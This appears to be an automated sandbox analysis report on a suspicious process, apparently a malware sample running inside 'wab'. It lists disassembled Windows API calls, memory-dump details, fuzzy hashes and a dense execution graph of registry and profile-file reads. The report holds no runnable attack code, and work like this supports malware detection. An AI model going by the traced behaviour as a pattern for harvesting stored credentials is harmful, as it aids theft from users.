                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                • String ID:
                                                • API String ID: 2678498856-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item
                                                • String ID:
                                                • API String ID: 3888421826-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00417B7B
                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ErrorLastLockUnlockmemset
                                                • String ID:
                                                • API String ID: 3727323765-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                • malloc.MSVCRT ref: 00417407
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$??3@malloc
                                                • String ID:
                                                • API String ID: 4284152360-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040F673
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                • strlen.MSVCRT ref: 0040F6A2
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040F6E2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                • strlen.MSVCRT ref: 0040F70D
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 00402FD7
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                • strlen.MSVCRT ref: 00403006
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                • String ID:
                                                • API String ID: 764393265-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Time$System$File$LocalSpecific
                                                • String ID:
                                                • API String ID: 979780441-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memcpy.MSVCRT ref: 004134E0
                                                • memcpy.MSVCRT ref: 004134F2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$DialogHandleModuleParam
                                                • String ID:
                                                • API String ID: 1386444988-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: InvalidateMessageRectSend
                                                • String ID: d=E
                                                • API String ID: 909852535-3703654223
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • wcschr.MSVCRT ref: 0040F79E
                                                • wcschr.MSVCRT ref: 0040F7AC
                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcschr$memcpywcslen
                                                • String ID: "
                                                • API String ID: 1983396471-123907689
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • _memicmp.MSVCRT ref: 0040C00D
                                                • memcpy.MSVCRT ref: 0040C024
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FilePointer_memicmpmemcpy
                                                • String ID: URL
                                                • API String ID: 2108176848-3574463123
                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemcpy
                                                • String ID: %2.2X
                                                • API String ID: 2789212964-323797159
                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintf
                                                • String ID: %%-%d.%ds
                                                • API String ID: 3988819677-2008345750
                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memset.MSVCRT ref: 0040E770
                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSendmemset
                                                • String ID: F^@
                                                • API String ID: 568519121-3652327722
                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PlacementWindowmemset
                                                • String ID: WinPos
                                                • API String ID: 4036792311-2823255486
                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                • wcscat.MSVCRT ref: 0040DCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileModuleNamewcscatwcsrchr
                                                • String ID: _lng.ini
                                                • API String ID: 383090722-1948609170
                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                • API String ID: 2773794195-880857682
                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcpy$memset
                                                • String ID:
                                                • API String ID: 438689982-0
                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@$memset
                                                • String ID:
                                                • API String ID: 1860491036-0
                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • memcmp.MSVCRT ref: 00408AF3
                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                • memcmp.MSVCRT ref: 00408B2B
                                                • memcmp.MSVCRT ref: 00408B5C
                                                • memcpy.MSVCRT ref: 00408B79
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmp$memcpy
                                                • String ID:
                                                • API String ID: 231171946-0
                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcslen$wcscat$wcscpy
                                                • String ID:
                                                • API String ID: 1961120804-0
                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:2.4%
                                                Dynamic/Decrypted Code Coverage:20.4%
                                                Signature Coverage:0.5%
                                                Total number of Nodes:847
                                                Total number of Limit Nodes:16
RegEnumKeyExA 33805->33971 33807 402d9c RegCloseKey 33807->33804 33808 410b1e 3 API calls 33809 402ce4 memset sprintf 33808->33809 33972 410a9c RegOpenKeyExA 33809->33972 33811 402d28 33812 402d3a sprintf 33811->33812 33973 402bd1 39 API calls 33811->33973 33974 410a9c RegOpenKeyExA 33812->33974 33815 402cb2 33815->33807 33815->33808 33818 402d9a 33815->33818 33975 402bd1 39 API calls 33815->33975 33976 410b62 RegEnumKeyExA 33815->33976 33818->33807 33819->33703 33820->33707 33821->33711 33823 410816 33822->33823 33824 4107f1 FreeLibrary 33823->33824 33825 403ddd 33824->33825 33825->33716 33977 410a9c RegOpenKeyExA 33826->33977 33828 402ff9 33829 403006 memset 33828->33829 33830 40312c 33828->33830 33978 410b62 RegEnumKeyExA 33829->33978 33830->33720 33832 403122 RegCloseKey 33832->33830 33833 410b1e 3 API calls 33834 403058 memset sprintf 33833->33834 33979 410a9c RegOpenKeyExA 33834->33979 33836 403033 33836->33832 33836->33833 33837 4030a2 memset 33836->33837 33838 410b62 RegEnumKeyExA 33836->33838 33840 4030f9 RegCloseKey 33836->33840 33981 402db3 26 API calls 33836->33981 33980 410b62 RegEnumKeyExA 33837->33980 33838->33836 33840->33836 33843 4032d5 33842->33843 33844 4033a9 33842->33844 33982 4021b6 memset 33843->33982 33857 4034e4 memset memset 33844->33857 33846 4032e1 33983 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33846->33983 33848 4032ea 33849 4032f8 memset GetPrivateProfileSectionA 33848->33849 33984 4023e5 16 API calls 33848->33984 33849->33844 33854 40332f 33849->33854 33851 40339b strlen 33851->33844 33851->33854 33853 403350 strchr 33853->33854 33854->33844 33854->33851 33985 4021b6 memset 33854->33985 33986 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33854->33986 33987 4023e5 16 API calls 33854->33987 33858 410b1e 3 API calls 33857->33858 33859 40353f 33858->33859 33860 40357f 33859->33860 33861 403546 _mbscpy 33859->33861 33865 403985 33860->33865 33988 406d55 strlen _mbscat 33861->33988 33863 403565 _mbscat 
33989 4033f0 19 API calls 33863->33989 33990 40466b _mbscpy 33865->33990 33869 4039aa 33871 4039ff 33869->33871 33991 40f460 memset memset 33869->33991 34012 40f6e2 33869->34012 34028 4038e8 21 API calls 33869->34028 33872 404785 FreeLibrary 33871->33872 33873 403a0b 33872->33873 33874 4037ca memset memset 33873->33874 34036 444551 memset 33874->34036 33876 4038e2 33876->33730 33940 40f334 334 API calls 33876->33940 33879 40382e 33880 406f06 2 API calls 33879->33880 33881 403843 33880->33881 33882 406f06 2 API calls 33881->33882 33883 403855 strchr 33882->33883 33884 403884 _mbscpy 33883->33884 33885 403897 strlen 33883->33885 33886 4038bf _mbscpy 33884->33886 33885->33886 33887 4038a4 sprintf 33885->33887 34048 4023e5 16 API calls 33886->34048 33887->33886 33890 44b090 33889->33890 33891 40fb10 RegOpenKeyExA 33890->33891 33892 403e7f 33891->33892 33893 40fb3b RegOpenKeyExA 33891->33893 33903 40f96c 33892->33903 33894 40fb55 RegQueryValueExA 33893->33894 33895 40fc2d RegCloseKey 33893->33895 33896 40fc23 RegCloseKey 33894->33896 33897 40fb84 33894->33897 33895->33892 33896->33895 33898 404734 3 API calls 33897->33898 33899 40fb91 33898->33899 33899->33896 33900 40fc19 LocalFree 33899->33900 33901 40fbdd memcpy memcpy 33899->33901 33900->33896 34053 40f802 11 API calls 33901->34053 33904 4070ae GetVersionExA 33903->33904 33905 40f98d 33904->33905 33906 4045db 7 API calls 33905->33906 33910 40f9a9 33906->33910 33907 40fae6 33908 404656 FreeLibrary 33907->33908 33909 403e85 33908->33909 33915 4442ea memset 33909->33915 33910->33907 33911 40fa13 memset WideCharToMultiByte 33910->33911 33911->33910 33912 40fa43 _strnicmp 33911->33912 33912->33910 33913 40fa5b WideCharToMultiByte 33912->33913 33913->33910 33914 40fa88 WideCharToMultiByte 33913->33914 33914->33910 33916 410dbb 9 API calls 33915->33916 33917 444329 33916->33917 34054 40759e strlen strlen 33917->34054 33922 410dbb 9 API calls 33923 444350 33922->33923 33924 40759e 3 API calls 33923->33924 33925 44435a 
33924->33925 33926 444212 65 API calls 33925->33926 33927 444366 memset memset 33926->33927 33928 410b1e 3 API calls 33927->33928 33929 4443b9 ExpandEnvironmentStringsA strlen 33928->33929 33930 4443f4 _strcmpi 33929->33930 33931 4443e5 33929->33931 33932 403e91 33930->33932 33933 44440c 33930->33933 33931->33930 33932->33510 33934 444212 65 API calls 33933->33934 33934->33932 33935->33692 33936->33696 33937->33704 33938->33708 33939->33712 33940->33730 33941->33732 33942->33746 33943->33750 33944->33743 33946 40841c 33945->33946 33947 410a9c RegOpenKeyExA 33946->33947 33947->33759 33948->33765 33949->33765 33950->33769 33951->33771 33952->33765 33953->33774 33954->33780 33955->33780 33956->33783 33957->33780 33959 404656 FreeLibrary 33958->33959 33960 4045e3 LoadLibraryA 33959->33960 33961 404651 33960->33961 33962 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33960->33962 33961->33786 33961->33790 33963 40463d 33962->33963 33964 404643 33963->33964 33965 404656 FreeLibrary 33963->33965 33964->33961 33965->33961 33967 403cd2 33966->33967 33968 40465c FreeLibrary 33966->33968 33967->33799 33968->33967 33969->33796 33970->33803 33971->33815 33972->33811 33973->33812 33974->33815 33975->33815 33976->33815 33977->33828 33978->33836 33979->33836 33980->33836 33981->33836 33982->33846 33983->33848 33984->33849 33985->33853 33986->33854 33987->33854 33988->33863 33989->33860 33990->33869 34029 4078ba 33991->34029 33994 4078ba _mbsnbcat 33995 40f5a3 RegOpenKeyExA 33994->33995 33996 40f5c3 RegQueryValueExA 33995->33996 33997 40f6d9 33995->33997 33998 40f6d0 RegCloseKey 33996->33998 33999 40f5f0 33996->33999 33997->33869 33998->33997 33999->33998 34000 40f675 33999->34000 34033 40466b _mbscpy 33999->34033 34000->33998 34034 4012ee strlen 34000->34034 34002 40f611 34004 404734 3 API calls 34002->34004 34009 40f616 34004->34009 34005 40f69e RegQueryValueExA 34005->33998 34006 40f6c1 34005->34006 34006->33998 34007 40f66a 34008 404785 
FreeLibrary 34007->34008 34008->34000 34009->34007 34010 40f661 LocalFree 34009->34010 34011 40f645 memcpy 34009->34011 34010->34007 34011->34010 34035 40466b _mbscpy 34012->34035 34014 40f6fa 34015 4045db 7 API calls 34014->34015 34016 40f708 34015->34016 34017 404734 3 API calls 34016->34017 34022 40f7e2 34016->34022 34023 40f715 34017->34023 34018 404656 FreeLibrary 34019 40f7f1 34018->34019 34020 404785 FreeLibrary 34019->34020 34021 40f7fc 34020->34021 34021->33869 34022->34018 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33869 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33994 34033->34002 34034->34005 34035->34014 34049 410a9c RegOpenKeyExA 34036->34049 34038 44458b 34039 40381a 34038->34039 34050 410add RegQueryValueExA 34038->34050 34039->33876 34047 4021b6 memset 34039->34047 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34039 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33879 34048->33876 34049->34038 34050->34041 34051->34044 34052->34046 34053->33900 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34099 444196 52 API calls 34062->34099 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34096 407f90 34066->34096 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34092 407e62 34070->34092 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33922 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen 
